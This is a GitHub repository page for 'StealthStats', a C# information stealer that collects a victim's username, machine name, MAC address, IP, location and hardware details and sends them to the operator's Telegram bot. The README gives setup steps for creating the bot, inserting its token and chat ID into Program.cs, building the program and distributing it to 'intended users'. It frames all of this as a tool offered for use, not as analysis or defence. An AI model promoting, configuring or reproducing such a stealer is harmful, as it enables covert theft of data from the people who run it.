Skip to content

πŸ”‘ This C#-based stealer allows you to capture logs and send them directly to your Telegram bot.

Notifications You must be signed in to change notification settings

0xRahad/StealthStats

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation


StealthStats

A powerful tool for gathering system information on Windows machines.

Features of this stealer

  • Steal UserName
  • Steal Machine Name
  • Show active windows
  • Show path where file was started
  • Show Operating system
  • Show screen metrics
  • Show CPU
  • Show GPU
  • Show RAM
  • Show IP
  • Show Country
  • Show City
  • Steal MAC Address

How To Setup:


Creating a Telegram bot:

  1. Open the Telegram app or visit the Telegram website.
  2. Search for the BotFather bot.
  3. Start a chat with the BotFather and follow the instructions to create a new bot.
  4. Once the bot is created, you will be provided with a token which is used to authenticate your bot.
  5. Set up the bot's profile picture, name, and description as necessary.

Collecting chat id:


  1. Add the bot to the group chat where you want to collect chat id.
  2. Send a message to the group chat.
  3. Use the Telegram API to get the chat id of the group chat.
  4. You can use a bot like https://t.me/cid_bot to get the chat id of any user or group chat.
    Simply add the bot to the chat and send the command /start. The bot will reply with the chat id.

How to modify the C# project


  1. Open the C# project in Visual Studio.

  2. Go to the Program.cs file.

  3. In that file, search for the variables or constants that store the Telegram bot token and chat ID.

  4. Replace the existing Telegram bot token and chat ID with your own values.


private static string _botToken = "Your Bot Token";
private static long _chatId = Your_Chat_ID;

  1. Save the changes to the file.

  2. Build the project to ensure that the changes are properly integrated.

  3. Test the program to ensure that it works as intended, and that the Telegram bot can receive messages and perform the desired actions.

  4. If the program works as expected, you can distribute it to your intended users.


-Credit:
         - Dev Name: Md Rahadul Islam
         - Education: Class 10
         - Group: Emperor Hacker's Community
         - Facebook: https://facebook.com/rahad-infosec
         - Thanks!

About

πŸ”‘ This C#-based stealer allows you to capture logs and send them directly to your Telegram bot.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages